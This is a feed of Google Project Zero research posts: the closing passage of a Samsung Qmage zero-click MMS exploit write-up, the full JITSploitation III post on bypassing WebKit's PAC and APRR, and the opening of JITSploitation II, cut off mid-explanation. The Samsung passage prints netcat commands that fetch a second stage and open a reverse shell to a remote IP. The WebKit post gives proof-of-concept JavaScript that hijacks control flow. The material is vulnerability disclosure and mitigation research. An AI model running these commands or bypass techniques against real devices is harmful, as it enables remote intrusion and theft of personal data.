It's very short, leaving up to 16 bytes for the combined length of the host and port, which is plenty of space. According to my testing, the direct "nc" symlink was introduced as recently as Android 10, but even when invoking netcat through the full "toybox nc" command on Android 9 and earlier, there are 9 characters left for the host/port, and 6-letter domains are still easily registered today. In my case, let's assume I executed the following line:

nc 12.34.56.78 1338|sh

Then on port 1338 of the remote host, I served the second stage payload:

tail -n 0 -f /data/data/com.samsung.android.messaging/1 | /bin/sh -i 2>&1 | nc 12.34.56.78 1337 1> /data/data/com.samsung.android.messaging/1

This is a cool trick to spawn a reverse shell with nc without the -e option, which I found here. It pipes together tail, sh and nc to achieve the result, and uses a temporary file (in a path accessible to the target process) to store the input commands. The gist of the trick is the -f tail option, used to pass commands to sh as they arrive over the network, providing the interactive feel. Once we send the above payload on port 1338, we should momentarily receive another connection on port 1337 with the full reverse shell:

$ nc -l -p 1337 -v
Listening on [0.0.0.0] (family 0, port 1337)
Connection from <redacted> 8632 received!
/bin/sh: can't find tty fd: No such device or address
/bin/sh: warning: won't have full job control
:/ $

And that's it! As shown in the exploit demo, the attacker now has remote access to the device in the security context of the Samsung Messages app. This effectively means that they can access the SMS/MMS messages, photos, contacts, and a number of other types of information on the phone. Given that the vulnerable Qmage codec is baked so deeply in Samsung Android, the attacker could try to further expand their reach in the system by exploiting the same vulnerability locally, compromising the context of another app and gaining access to its data. One example of a potential attack target is the com.android.systemui process, which is highly privileged by nature and is responsible for handling images supplied by other apps to be displayed in notifications. In a similar vein, some degree of persistence could be established by planting an exploit .qmg file in the file system, and having it connect back to a remote host every time the user opens the Gallery app. Once initial command line access to the target phone is obtained, the possibilities of abusing Qmage bugs locally are virtually endless.

Future work

The journey of developing a zero-click MMS exploit against a modern Samsung phone running Android 10 comes to an end. The fundamental reason why the attack was possible was the custom, exceedingly fragile image codec built into Android Skia by Samsung. In order to address the immediate problem, I ran two Qmage fuzzing sessions and reported the resulting crashes to the vendor: one in January 2020 (fixed in May as SVE-2020-16747 / CVE-2020-8899), and a subsequent one in May (fixed in July as SVE-2020-17675). I would like to believe that the codec is now in a much better shape, but I encourage other members of the security community to continue testing it, either with the existing SkCodecFuzzer harness or other custom tools.

While Qmage is the primary culprit here, the vulnerabilities created a great opportunity to test the effectiveness of various Android 10 mitigations and design decisions against low-level exploitation in a realistic setting. Throughout the process, I managed to take advantage of weaknesses in various parts of the OS; some of them were only minor help, while other were absolutely critical to the feasibility of the exploitation:

  • The Samsung Messages app automatically downloads incoming MMS messages and parses attached images without user interaction and before completing communication with the MMSC, which opens up the remote attack surface and enables the creation of a crash-based ASLR oracle.
  • The image parsing code executes in the same process as the client app, and is not sandboxed similarly to video codecs.
  • The Android ASLR suffers from several flaws:
    • The Zygote design causes a persistent address space layout across subsequent instances of a crashing app, enabling partial ASLR side channel output to be accumulated over time and combined into a complete ASLR bypass.
    • The sizable CFI shadow region makes it possible to blindly locate readable memory in the address space with an ASLR oracle,
    • The relative entropy between library mappings and the shadow area is quite low, especially for linker64.
    • The presence of execute-only mappings makes it easy to recognize specific shared objects with an oracle, even if they are tightly packed in memory.
  • The crash handling logic in ActivityManager allows for infinite restarts of an unstable app, provided that no two crashes occur within 60 seconds of each other (measured with the uptimeMillis clock).
  • The jemalloc heap allocator has generally favorable properties for exploitation: it's deterministic, doesn't have inline metadata, groups chunks by size, and implements tcaches which may help control uninitialized heap memory with a high degree of precision.
  • Android allows apps to spawn native command-line programs through functions like execve, system, __dl_popen etc. The system also includes networking tools such as netcat, which can be trivially used to set up a reverse shell for convenient remote access post-exploitation.

The above list gives a good overview of the areas for improvement, and we are working with both Android and Samsung to address them and introduce new hardening measures in future versions of the OS and the Samsung Messages app. In some areas, work had already been in motion before this project; for example the upcoming Android 11 fully switches from jemalloc to Scudo as its default heap allocator, and XOM is reverted because it breaks PAN. Furthermore, the effort has already led to some changes in ASLR:


All of these mitigations already make an MMS exploit substantially harder to develop, but there is still a lot of work to do. I will strive to push for further fixes in the areas enumerated above, to make sure that similar zero-click attacks against Android devices cannot be replicated in the future.

Conclusion

The blog post series demonstrated that there are still some very attractive and largely unexplored code bases written in memory-unsafe languages and exposed in widely used software today. It strikes me that the Qmage codec has stayed out of the public eye for so long, evading any kind of fuzzing or manual audit. It raises the question of how much other untested code runs on our desktops and mobile devices every day that we know nothing about, and it highlights the importance of transparency from software vendors. It's in the interest of users to be well-informed about the relevant attack surface, and to benefit from the collective work of the security community researching publicly documented code. Otherwise, bad actors are more incentivized to look for little-known, sensitive software components, and exploit them secretly. In that context, security by obscurity doesn't work, especially if obscurity is the primary element of the software security model.

Another takeaway is that successful exploitation of memory corruption issues in zero-click scenarios is still possible, despite significant efforts being made to mitigate such attacks. Admittedly, the existing security measures in Android made the exploitation harder, slower and less reliable; specifically, thanks to address randomization and the crash handling logic, the attack took between 1h – 2.5h instead of a single message. However, none of them ultimately stopped the exploit, and all it took to bypass ASLR was the forgotten feature of MMS delivery reports coupled with a strong address probing primitive.

Clearly, memory corruption is far from a solved problem, and keeping our systems secure requires continued work on all levels of software design and development. As we've seen, even minor decisions seemingly unrelated to security – whether to allow unlimited restarts of frequently crashing apps – can make the difference between a feasible and thwarted exploit. This is where offensive exercises like this one bring the most value, as they help discern effective mitigations from futile ones, and guide further defensive work towards the areas that matter the most. On that note, I am especially looking forward to some new, fundamental advancements, such as the shift towards fast memory-safe languages like Rust, and widespread use of hardware-assisted mitigations such as Memory Tagging Extension.
✇Google Project Zero

JITSploitation III: Subverting Control Flow

By: Tim
Posted by Samuel Groß, Project Zero

This three-part series highlights the technical challenges involved in finding and exploiting JavaScript engine vulnerabilities in modern web browsers and evaluates current exploit mitigation technologies. The exploited vulnerability, CVE-2020-9802, was fixed in iOS 13.5, while two of the mitigation bypasses, CVE-2020-9870 and CVE-2020-9910, were fixed in iOS 13.6.

==========

This post is third in a series about a Safari renderer exploit. Part 1 discussed a JIT compiler vulnerability in JSC and Part 2 showed how it could be turned into a reliable read/write primitive despite various mitigations. The purpose of this post is to provide an overview of the various code execution mitigations present in WebKit on iOS 13 and to discuss different approaches for bypassing them.

The Evolution of iOS JIT Hardenings

In the “old” days of browser exploitation, an attacker with a read/write capability in a renderer process would simply write arbitrary shellcode into the rwx JIT region and call it a day. 

The first software-based mitigation against this technique in WebKit was deployed in 2016: the “Bulletproof JIT”. It worked by mapping the JIT region twice, once as r-x for execution and once as rw- for writing. The writable mapping was placed at a secret location in memory and the bulletproof JIT then relied on a --x region containing a jit_memcpy function that would copy given data into the writable JIT mapping without disclosing its secret address. However, this mitigation was rather easy to defeat due to the lack of CFI, for example via ROP. Moreover, if an attacker was able to disclose the location of the writable mapping through some means, they could simply write their shellcode to it.

The iOS JIT hardening became stronger with the addition of hardware assisted mitigations around the introduction of the iPhone Xs, namely APRR and PAC. These will be discussed next. For a fuller picture of the various iOS exploit mitigations, the interested reader is referred to the presentation “Evolution of iOS mitigations” by Siguza.

APRR

While the expansion of this acronym is not known for certain outside of Apple, its functionality is fairly well understood. Without going into too much technical detail - the interested reader is referred to Siguza’s blog post on APRR for that - the goal behind APRR is essentially to enable per-thread page permissions. This is implemented by mapping page table entry permissions to their real permission with dedicated CPU registers. With that, page permissions essentially simply become an index into the APRR registers which now hold the actual page permissions. As a simplified example, consider the following APRR mapping:

Page Table Entry Permission
Resulting Index
APRR Register at that Index
---
0
---
--x
1
--x
-w-
2
-w-
-wx
3
--x
r--
4
r--
r-x
5
r-x
rw-
6
rw-
rwx
7
r-x

With the APRR register set up in this way, it would effectively enforce a strict W^X policy: no page could ever be writable and executable at the same time. 

In WebKit, APRR is now used to protect the JIT region: the JIT region’s page table permissions are rwx, but W^X is enforced as shown above. As such, the JIT region is effectively r-x and thus trying to directly write into it will trigger a segfault. As the JIT region has to be written into from time to time (when new code is compiled or existing code is updated), it is necessary to change the permissions of the region. This is done through a dedicated “unlock” function which changes the value of the APRR register at index 7 (corresponding to the page table permissions rwx) to rw-. However, this happens only for the thread that is about to copy data into the JIT region while the region remains r-x for all other threads. This prevents an attacker from racing the JIT compiler thread when it unlocks the region. Below is the slightly simplified source code of the performJITMemcpy function, responsible for copying code into the JIT region:

ALWAYS_INLINE void* 
performJITMemcpy(void *dst, const void *src, size_t n)
{
    os_thread_self_restrict_rwx_to_rw();
    memcpy(dst, src, n);
    os_thread_self_restrict_rwx_to_rx();
    return dst;
}

Also note the use of ALWAYS_INLINE which forces this function to be inlined at every callsite. More on that later.

APRR by itself would be fairly easy to bypass. The two main types of attacks are:
  1. ROPing, JOPing, etc. into the performJITMemcpy function (or really, a function where it is inlined) and that way copy arbitrary code into the JIT region.
  2. As the compiler assembles machine code into a temporary heap buffer which is afterwards copied into the JIT region, it would be possible for an attacker to corrupt the machine code on the heap prior to the copy.

Enter PAC.

PAC

PAC, short for Pointer Authentication Codes, is another hardware feature which allows storing a cryptographic signature in the otherwise unused top bits of a pointer. It has been the topic of much research and is by now well documented, for example in a blogpost by Brandon Azad. With PAC enabled, every code pointer must have a valid signature which is checked before transferring control flow to it. As the PAC keys are kept in registers, they are inaccessible to an attacker who is thus unable to forge valid pointers.

PAC thus immediately prevents an attacker from performing attack 1) above. Also, since the performJITMemcpy function is marked as ALWAYS_INLINE, there will be no existing function pointers to it that would allow an attacker to call this function with controlled arguments.

Attack 2) needs additional work to mitigate. The issue mainly manifests inside the LinkBuffer::copyCompactAndLinkCode function, responsible for copying (and linking as well as possibly compacting) the previously assembled machine code into the JIT region. If an attacker was able to corrupt the heap buffer containing the machine code before this function copies it into the JIT region, the attacker would gain arbitrary code execution. This attack is mitigated by computing a PAC-based hash over the machine code during assembling, then recomputing and verifying that hash during copying. This way, it is ensured that whatever the assembler emitted is also copied into the JIT region without modifications. While it is likely possible to trick the compiler to emit somewhat controllable code, more on that later, it is no longer generally possible to execute arbitrary instructions as the assembler only supports a limited set of instructions.

Summary

Together, APRR and PAC achieve the following:
  • The JIT region is effectively mapped r-x and is “unlocked” only for a short period of time and only for a single thread when JIT code is updated. This prevents an attacker from writing into the JIT region directly
  • PAC is used to enforce CFI and thus prevent an attacker from performing classic code reuse attacks like ROP, JOP, etc. It is also not possible to call the performJITMemcpy function directly as it is always inlined into its callers
  • PAC is used to ensure the integrity of emitted JIT code before it is copied into the JIT region

This was the starting point for the final part of this research project. The remainder of this post will now discuss different bypass approaches.

Bypassing The JIT Hardenings

The different attacks presented next ultimately strive to gain a level of control over the program’s execution flow that is powerful enough to implement a second stage exploit (most likely some form of sandbox escape). This is most likely what an attacker would usually attempt to achieve. It should be kept in mind, however, that without something like site isolation, an attacker with a memory read/write capability in a renderer process is usually able to construct a UXSS attack, thus gaining access to various web credentials and sessions and possibly even gaining persistence through web workers. These issues have been demonstrated in the past and will thus not be discussed further.

Shellcode-less Exploitation

First of all, it is important to note that an attacker does not necessarily need shellcode execution. For example, it is possible to abuse the ObjectiveC and JavaScriptCore runtime so that arbitrary function and syscalls can be performed from JavaScript. This in turn can then be used to implement the next stage of an exploit chain, avoiding the need to bypass the JIT hardenings altogether. This has already been demonstrated and was thus not researched further during this project.

Similarly, while the JIT’s final output - the machine code - is protected through PAC, its intermediate outputs, in particular the various IRs - DFG, B3, and AIR - and other supporting data structures are not protected and thus are subject to manipulation by an attacker. A possible approach is thus to corrupt the JIT’s IR code in order to for example trick the compiler into generating calls to arbitrary functions with controlled arguments. This would likely grant a very similar primitive to the one above, i.e. being able to execute controlled syscalls, and was thus not explored further during this research.

Race Conditions

Race conditions appear to be somewhat widespread along the PAC+APRR boundary. As an example, the following is a rather typical invocation of performJITMemcpy, in this case to repatch a pointer-sized immediate value in JIT generated code:

int buffer[4];
buffer[0] = moveWideImediate(Datasize_64, MoveWideOp_Z, 0,  
                             getHalfword(value, 0), rd);
buffer[1] = moveWideImediate(Datasize_64, MoveWideOp_K, 1, 
                             getHalfword(value, 1), rd);
buffer[2] = moveWideImediate(Datasize_64, MoveWideOp_K, 2, 
                             getHalfword(value, 2), rd);
if (NUMBER_OF_ADDRESS_ENCODING_INSTRUCTIONS > 3)
    buffer[3] = moveWideImediate(Datasize_64, MoveWideOp_K, 3, 
                                 getHalfword(value, 3), rd);
performJITMemcpy(address, buffer, sizeof(int) * 4);

Here, the machine instructions necessary to load the immediate value are first emitted into a stack allocated buffer which is subsequently copied into the JIT region via performJITMemcpy. As such, if another thread managed to corrupt the stack allocated buffer before it is copied into the JIT region, the attacker would gain arbitrary code execution. However, the race window here is very small, and losing the race might cause in-use stack memory to be corrupted, possibly leading to a crash. (This code also suffers from another, theoretical bug: should NUMBER_OF_ADDRESS_ENCODING_INSTRUCTIONS ever be less than 4, then it would copy uninitialized stack memory into the JIT region…). 

Ultimately, I decided to exclude race conditions that could not safely be lost from this research project, as it can be argued that a mitigation that forces attackers to win a race while risking a process crash is in some aspect working as intended.

Unprotected Code Pointers

Another possible attack vector are cases where PAC is used incorrectly. Examples for that include:
  1. Places that sign a raw pointer that can be corrupted by the attacker
  2. Places that call an unsigned function pointer that can be controlled by the attacker

Finding such cases is possible through static analysis on the assembly code. While I initially wanted to use one of binary ninja’s various ILs for this due to their support for various dataflow analyses, the lack of support for PAC instructions made this harder and I went instead for a very simple IDAPython script which would output sequences of instructions ending in a PAC signing instruction such as PACIZA. When run on a DyldSharedCache image, the script would output many thousands of lines such as

libz.1:__text:0x1b6ba1444  ADRL X16, sub_1B6BA9434; PACIZA X16

This “gadget” essentially takes a constant (the address of sub_1B6BA9434) and signs it using the A key and a context of zero. As such, it is not very interesting for an attacker as the signed value cannot be controlled. After filtering out such obviously safe code snippets, one remaining and frequently occurring code pattern looked like this:

ADRP            X16, #[email protected]
LDR             X16, [X16,#[email protected]]
PACIZA          X16

This code snippet loads a raw pointer from a writable page, then signs it using the PACIZA instruction. As such, an attacker can bypass PAC by overwriting the raw pointer in memory, then somehow getting this code to execute. It appears that the compiler emitted this vulnerable code every time a function from a different compilation unit was referenced as a pointer instead of being called directly. This particular code snippet was the machine code of the following C++ code in JavaScriptCore:

LValue Output::doublePow(LValue xOperand, LValue yOperand)
{
    double (*powDouble)(double, double) = pow;
    return callWithoutSideEffects(B3::Double, powDouble, xOperand, yOperand);
}

This function is used by the JIT compiler when a Math.pow invocation that is known to operate on double values is optimized. In that case, the compiler emits a call to the C pow function, and for that loads and signs its address with this function. Due to the bug in the compiler, the imported function pointer was, however, placed in a writable section but also not protected by PAC. The PoC for this issue is then quite simple:

// offset from iOS 13.4.1, iPhone Xs
let powImportAddr = Add(jscBase, 0x34e1d570);
memory.writePtr(powImportAddr, new Int64('0x41414141'));

function trigger(x) {
    return Math.pow(x, 13.37);
}
for (let i = 0; i < 10000000; i++) {
    trigger(i + 0.1);
}

This will result in a crash with PC=0x41414141, demonstrating that PAC has been bypassed.

Searching with a slightly modified IDAPython script for the second vulnerability type, a call to an unprotected pointer, also resulted in an interesting code snippet:

MOV             W9, #0x6770
ADRP            X16, #[email protected]
LDR             X16, [X16,#[email protected]]
BLR             X16

This code, found at the start of many large functions, branches to the __chkstk_darwin function, which is likely responsible for preventing a huge stackframe from “jumping over” a stack guard page in case of a stack overflow. For some reason however, the pointer to that function was loaded from a writable memory region and was also not protected by PAC. As such, it was again possible to execute arbitrary code as demonstrated by the following code snippet:

// offset from iOS 13.4.1, iPhone Xs
let __chkstk_darwin_ptr = Add(jscBase, 0x34e1d430);
memory.writePtr(__chkstk_darwin_ptr, new Int64('0x42424242'));

// Just need to trigger FTL compilation now, we'll crash in FTL::lowerDFGToB3
function foo(x) {
    return Math.pow(x, 13.37);
}
for (let i = 0; i < 10000000; i++) {
    foo(i + 0.1);
}

This works because of the widespread use of __chkstk_darwin in basically any function with a large stack frame, one of which, namely FTL::lowerDFGToB3, is executed during JIT compilation.

The two issues were reported to Apple as Project Zero issue #2044 and were subsequently fixed in iOS 13.6 on July 15th and assigned CVE-2020-9870. The IDAPython script used to find these gadgets can also be found in the report for issue #2044.

Manipulating Mach Messages

Inspired by various chats with fellow Project Zero team member Brandon Azad, the idea behind this bypass is to corrupt a mach message struct before it is sent out via the mach_msg syscall. On iOS and macOS, a large portion of the kernel interface, the entire IOKIT driver interface, as well as basically all userspace IPC is implemented through mach messages, making this a powerful exploit primitive. For example, it should be possible to (ab)use virtual memory related mach syscalls to bypass PAC and/or APRR by changing memory protections or remapping pages. Alternatively, controlling mach messages would again allow implementing a stage 2 exploit from JavaScript, unless the ability to perform BSD syscalls was required for it.

A simple, yet imperfect approach to find code that sends mach messages is to hook the mach_msg function with a Frida script, then deduplicate its invocations based on their callstack. This is imperfect as it will miss code paths that are rarely executed during normal operations, but is very quick to implement. Doing this in a WebKit renderer process will show roughly the following groups of related calls to mach_msg:

Ultimately, all of these cases appeared to be race conditions, as the constructed mach message was mostly immediately sent out without lingering in memory for some (ideally attacker-controllable) time during which it could be corrupted. As losing the race in these cases results in either heap (in the case of IPC and XPC communication) or stack (in the case of mach syscalls) corruption, the races can likely not safely be repeated and as thus these cases didn’t meet the requirements of a reliable bypass technique.

Abusing Signal Handlers

PAC (like many other mitigations) relies on crashing the process in order to stop the attacker. An interesting target are thus signal handling mechanisms that can interrupt the crashing process.

WebKit has support for signal handling inside the renderer process, which it uses for some JavaScriptCore optimizations. For example, JSC supports an execution mode for WASM code where all bounds checks are omitted, but where the WASM heap is followed by a 32GB guard region. Since WASM memory accesses use 32bit indices, if an invalid access occurs in WASM, it will always access a guard page, cause a segfault, and then run the WASM signal handler. The handler will then repatch the WASM code so that the faulting thread will raise a JavaScript exception upon resuming.

Exception handling in WebKit is based on the mach exception handling infrastructure instead of the UNIX signal handling facilities. Here is a brief overview of how it works:
  1. When an exception occurs in some renderer thread, a GCD worker thread is woken up by the kernel to handle the exception
  2. The thread executes mach_msg_server_once, which fetches the mach message describing the exception from the kernel, allocates the reply message, then passes both to a handler function
  3. _Xmach_exception_raise_state_identity, an auto-generated MIG function, is the registered handler for exception messages. It will dissect the input mach message, extracting values like the register contents at the time of the crash, then execute the “real” handler function:
  4. catch_mach_exception_raise_state will now iterate over a linked list of registered handlers (such as the WASM fault handler) and execute each one of them, also passing them the output register state which they can modify. Depending on whether one of the handlers handled the exception, this function will return KERN_SUCCESS or KERN_FAILURE
  5. Back in _Xmach_exception_raise_state_identity, the return value as well as the output register state are used to populate the reply message
  6. mach_msg_server_once finally sends the reply message to the kernel, then returns control to GCD
  7. The kernel will now either resume the crashed thread with the output register state if the return value was KERN_SUCCESS, otherwise terminate it

The process is visualized again in the following graphics.

Image: The interaction between different system components during mach exception handling


This now enables the following attack:

  1. The singly-linked list of handlers is corrupted and turned into a cycle. This is possible because, in contrast to the handler function pointers, the next pointer of the list elements are not protected by PAC
  2. An access violation is caused in a separate thread. This will cause a GCD thread to become “stuck” in catch_mach_exception_raise_state, looping infinitely due to the cycle
  3. A thread under the attacker's control now searches through all thread stacks (they are allocated contiguously in memory) looking for the return address of catch_mach_exception_raise_state. Once found, it now also has access to the reply mach message as a pointer to it is spilled on the stack. The reply message can then directly be manipulated by the attacker. In particular, the new register state (except for PC, which is protected by PAC) and the return value, indicating whether the exception was handled or not, can now be set.
  4. The spilled pointer on the stack is replaced with a different one to cause _Xmach_exception_raise_state_identity to write the actual return value of the signal handler (which will be KERN_FAILURE) into a different memory location while its caller, mach_msg_server_once will send the attacker-controlled reply message back to the kernel
  5. The thread fixes up the handler list, causing the handler thread to break out of the loop and return from catch_mach_exception_raise_state. The kernel will now receive a completely attacker controlled reply message and will thus resume the crashed thread with attacker controlled register (and stack) context

This is quite a strong exploitation primitive, essentially enabling the construction of a small “debugger” capable of breaking on most data accesses in the program and able to change the execution context at those points mostly arbitrarily. This can in turn be used in multiple ways to bypass PAC and/or APRR. Possible ideas include:

  • Corrupt the AssemblerBuffer so arbitrary instructions are copied into the JIT region by the LinkBuffer. This will cause the computed hashes to mismatch and the linker to crash, but that only happens after the instructions have been copied and the crash can then simply be caught
  • Crash during one of the writes into the JIT region in LinkBuffer::copyCompactAndLinkCode (by corrupting the destination pointer prior to that) and change the content of the source register so that an arbitrary instruction is written into the JIT region while the original instruction is used for the hash computation
  • Crash during LinkBuffer::copyCompactAndLinkCode and resume execution somewhere else. This should leave the JIT region writable (although not executable) for that thread
  • Brute-force a PAC code (e.g. by repeatedly accessing, crashing, and then changing a PAC protected pointer), then JOP into one of the functions into which performJITMemcpy is inlined

A simple PoC demonstrating how this technique works (or, by now, used to work) can be found in the published proof of concept exploit code in the pwn.js file. It implements a simple PAC bypass with this “debugger” for TypedArrays by corrupting a PAC-protected buffer pointer, catching the exception during its access, then changing the register holding the raw pointer and resuming execution.

This issue was reported to Apple as Project Zero issue #2042. It was then fixed in WebKit HEAD with commit 014f1fa8c2 (only 6 days after the report) by initializing the signal handlers when the JavaScript engine is initialized, then marking the memory region holding the signal handlers as read-only. This prevents an attacker from modifying the list. The fix was shipped to users with iOS 13.6 on July 15th and the issue was assigned CVE-2020-9910.

Variants

This “bug” pattern is a bit more general and also not strictly related to signal handling. As an example, consider the following code from LinkBuffer::copyCompactAndLinkCode:

if (verifyUncompactedHash.finalHash() != expectedFinalHash) {
    dataLogLn("Hashes don't match: ", ...);
    dataLogLn("Crashing!");
    CRASH();
}

This code is executed if, during linking and copying of the assembled code, JSC determines that the machine code has been corrupted as the cryptographic hashes don’t match. The problem here is that an attacker might be able to corrupt data in a way that causes dataLogLn, a nontrivial function, to block or spin infinitely, for example by corrupting a lock or making some loop run forever. In that case, the attacker-controlled machine code will already have been copied into the JIT region and can afterwards be executed by the attacker in another thread without fear of losing a race against CRASH(). This potential variant was likely identified by Apple shortly after the original issue was reported to them, then fixed in WebKit with commit e87946b7a8.

As another example, the following function was called by JSC just before it was going to CRASH() when it encountered an incorrectly PAC signature (WebKit’s PtrTag mechanism is based on PAC), indicating corruption of critical data by an attacker:

void reportBadTag(const void* ptr, PtrTag expectedTag)
{
    dataLog("PtrTag ASSERTION FAILED on pointer ", RawPointer(ptr), ", actual tag = ", tagForPtr(ptr));
    ...
}

The tagForPtr call actually ends up traversing a linked list:

static const char* tagForPtr(const void* ptr)
{
    PtrTagLookup* lookup = s_ptrTagLookup;
    while (lookup) {
        const char* tagName = lookup->tagForPtr(ptr);
        if (tagName)
            return tagName;
        lookup = lookup->next;
    }

    ...

As such, by turning this list into a cycle, it again became possible to prevent crashing due to a PAC failure. This in turn allows a brute-force attack against PAC or possibly leaking a validly signed, arbitrary pointer as documented in the report for this variant. This variant was reported to Apple as a variant of Project Zero issue #2042, then fixed with commits 13e30ec7a5 and db8b3982f2.

Finally, even “broader” variants of this issue may exist: if there is code that spills sensitive values (e.g. raw pointers after authentication) to the stack temporarily before performing actions that can be made to block by the attacker (e.g. a loop or a lock operation), then, an attacker might be able to corrupt sensitive data without having to win a race. No such places were identified throughout this research though.

Summary

In essence, every bit of code that executes after a failure condition has been detected but before the process is ultimately terminated should be considered as an attack surface, with the attacker potentially “winning” if they are able to make this code block. With signal handling, this becomes even more complex as code such as

if (security_failure) {
    CRASH();
}

Is in fact more like

if (security_failure) {
    signal_handler();
    CRASH();
}

Ideally, signal handling would thus be removed entirely from critical processes, or at least restricted to fewer signals. All in all, the speed at which these fixes were implemented implies that Apple is committed to PAC (and APRR) as a serious security mitigation.

Conclusion 

This post discussed multiple ways for bypassing WebKit’s JIT hardenings. While some approaches didn’t work or weren’t attempted further for various reasons, two previously unknown (at least publicly…) issues, as well as multiple variants thereof, were discovered that allowed for reliable bypasses. They were reported to Apple and subsequently fixed in iOS 13.6 as CVE-2020-9870 and CVE-2020-9910.

This post also concludes the three part series. All in all it was a substantial time investment to first find a suitable vulnerability, then bypass the various exploit mitigations with it. However, it is important to keep in mind that a large part of this effort is a one time cost for an attacker, required for the first exploit developed. Afterwards, the attack can likely reuse the majority of the previous exploit work for subsequent vulnerabilities. On the other hand, once mitigation bypasses are treated similarly to vulnerabilities and fixed swiftly once reported (as well as included in bug-bounty programs), this argument becomes weaker as an attacker is now disrupted if either their vulnerability or their mitigation bypass is reported or otherwise found by the vendor. In addition to the exploited vulnerability, Apple also quickly fixed the PAC bypasses and assigned CVE numbers for them. It was pleasing to see Apple's commitment to fixing the mitigation bypass quickly and I hope that they continue to do so in the future.

While logic vulnerabilities will likely allow for sandbox escapes for the foreseeable future and are largely unaffected by exploit mitigation technologies, it seems plausible that a typical exploit chain will still require renderer shellcode execution (or at least something roughly equivalent). Since some form of memory corruption is likely required for that, developing and maintaining memory corruption mitigations at various levels (close to the initial bug with MTE, during the early exploitation phase with the Gigacage and StructureID randomization, and after read/write has already been achieved through PAC and APRR) alongside stronger sandboxing, appears, generally speaking, to be a worthwhile investment.
✇Google Project Zero

JITSploitation II: Getting Read/Write

By: Tim
Posted by Samuel Groß, Project Zero

This three-part series highlights the technical challenges involved in finding and exploiting JavaScript engine vulnerabilities in modern web browsers and evaluates current exploit mitigation technologies. The exploited vulnerability, CVE-2020-9802, was fixed in iOS 13.5, while two of the mitigation bypasses, CVE-2020-9870 and CVE-2020-9910, were fixed in iOS 13.6.

==========

This is the second part in a series about a Safari renderer exploit from a JIT bug. In Part 1, a vulnerability in the DFG JIT’s implementation of Common-Subexpression Elimination was discussed. The second part starts from the well-known addrof and fakeobj primitives and shows how stable, arbitrary memory read/write can be constructed from it. For that, the StructureID randomization mitigation and the Gigacage will be discussed and bypassed.

Overview

Back in 2016, an attacker would use the addrof and fakeobj primitives to fake an ArrayBuffer, thus immediately gaining a reliable arbitrary memory read/write primitive. But in mid 2018, WebKit introduced the “Gigacage”, which attempts to stop abuse of ArrayBuffers in that way. The Gigacage works by moving ArrayBuffer backing stores into a 4GB heap region and using 32bit relative offsets instead of absolute pointers to refer to them, thus making it (more or less) impossible to use ArrayBuffers to access data outside of the cage.

However, while ArrayBuffer storages are caged, JSArray Butterflies, which contain the array’s elements, are not. As they can store raw floating point values, an attacker immediately gains a fairly powerful arbitrary read/write by faking such an “unboxed double” JSArray. This is how various public exploits have worked around the Gigacage in the past. (Un)fortunately, WebKit has introduced a mitigation aimed to stop an attacker from faking JavaScript objects entirely: StructureID randomization. This mitigation will thus have to be bypassed first.

As such, this post will
  • Explain the in-memory layout of JSObjects
  • Bypass the StructureID randomization to fake a JSArray object
  • Use the faked JSArray object to set up a (limited) memory read/write primitive
  • Break out of the Gigacage to get a fast, reliable, and truly arbitrary read/write primitive

Let’s go. 

Faking Objects

In order to fake objects, one has to know their in-memory layout. A plain JSObject in JSC consists of a JSCell header followed by the “Butterfly” and possibly inline properties. The Butterfly is a storage buffer containing the object’s properties and elements as well as the number of elements (the length):

Image: Layout of a JSC Butterfly in memory

Objects such as JSArrayBuffers add further members to the JSObject layout. 

Each JSCell header references a Structure through the StructureID field in the JSCell header which is an index into the Runtime’s StructureIDTable. A Structure is basically a blob of type information containing information such as:
  • The base type of the object, such as JSObject, JSArray, JSString, JSUint8Array, …
  • The properties of the object and where they are stored relative to the object
  • The size of the object in bytes
  • The indexing type, which indicates the type of array elements stored in the butterfly, such as JSValue, Int32, or unboxed double, and whether they are stored as one contiguous array or in some other way, for example in a map.
  • Etc.

Finally, the remaining JSCell header bits contain things like the GC marking state and “cache” some of the frequently used bits of type information, such as the indexing type. The image below summarizes the in-memory layout of a plain JSObject on a 64bit architecture.

Image: Layout of a JSC JSObject in memory


Most operations performed on an object will have to look at the object’s Structure to determine what to do with the object. As such, when creating fake JSObjects, it is necessary to know the StructureID of the type of object that is to be faked. Previously, it was possible to use StructureID Spraying to predict StructureIDs. This worked by simply allocating many objects of the desired type (for example, Uint8Array) and adding a different property to each of them, causing a unique Structure and thus StructureID to be allocated for that object. Doing this maybe a thousand times would virtually guarantee that 1000 was a valid StructureID for a Uint8Array object. This is where StructureID randomization, a new exploit mitigation from early 2019, now comes into play.

StructureID Randomization

The idea behind this exploit mitigation is straight forward: as an attacker (supposedly) needs to know a valid StructureID to fake objects, randomizing the IDs will hamper that. The exact randomization scheme is well documented in the source code. With that, it is now no longer possible to predict a StructureID.

There are different approaches to bypass StructureID randomization, including:
  1. Leaking a valid StructureID, e.g. through an OOB read
  2. Abusing code that does not check the StructureID, as has already been demonstrated
  3. Constructing a "StructureID oracle" to brute force a valid StructureID

A possible idea for the "StructureID oracle" is to abuse the JIT again. One very common code pattern emitted by the compiler are StructureChecks to guard type speculations. In pseudo-C they look roughly like this: 

int structID = LoadStructureId(obj)
if (structID != EXPECTED_STRUCT_ID) {
    bailout();
}

This could allow the construction of a “StructureID oracle”: if a JIT compiled function can be constructed that checks, but then doesn’t use a structure ID, then an attacker should be able to determine whether a StructureID is valid by observing whether a bailout had occurred. This in turn should be possible either through timing, or by “exploiting” a correctness issue in the JIT that causes the same code to produce different results when run in the JIT vs in the interpreter (where execution would continue after a bailout). An oracle like this would then allow an attacker to brute force a valid structure ID by predicting the incrementing index bits and brute forcing the 7 entropy bits.

However, leaking a valid structureID and abusing code that doesn't check the structureID seem like the easier options. In particular, there is a code path in the interpreter when loading elements of a JSArray that never accesses the StructureID:

static ALWAYS_INLINE JSValue getByVal(VM& vm, JSValue baseValue, JSValue subscript)
{
    ...;
    if (subscript.isUInt32()) {
        uint32_t i = subscript.asUInt32();
        if (baseValue.isObject()) {
            JSObject* object = asObject(baseValue);
            if (object->canGetIndexQuickly(i))
                return object->getIndexQuickly(i);

Here, getIndexQuickly directly loads the element from the butterfly, and canGetIndexQuickly only looks at the indexing type in the JSCell header (for which the values are known constants) and the length in the butterfly:

bool canGetIndexQuickly(unsigned i) const {
    const Butterfly* butterfly = this->butterfly();
    switch (indexingType()) {
    ...;
    case ALL_CONTIGUOUS_INDEXING_TYPES:
        return i < butterfly->vectorLength() && butterfly->contiguous().at(this, i);
}

This now allows faking something that looks a bit like a JSArray, pointing its backing storage pointer onto another, valid JSArray, then reading that JSArray’s JSCell header which includes a valid StructureID:

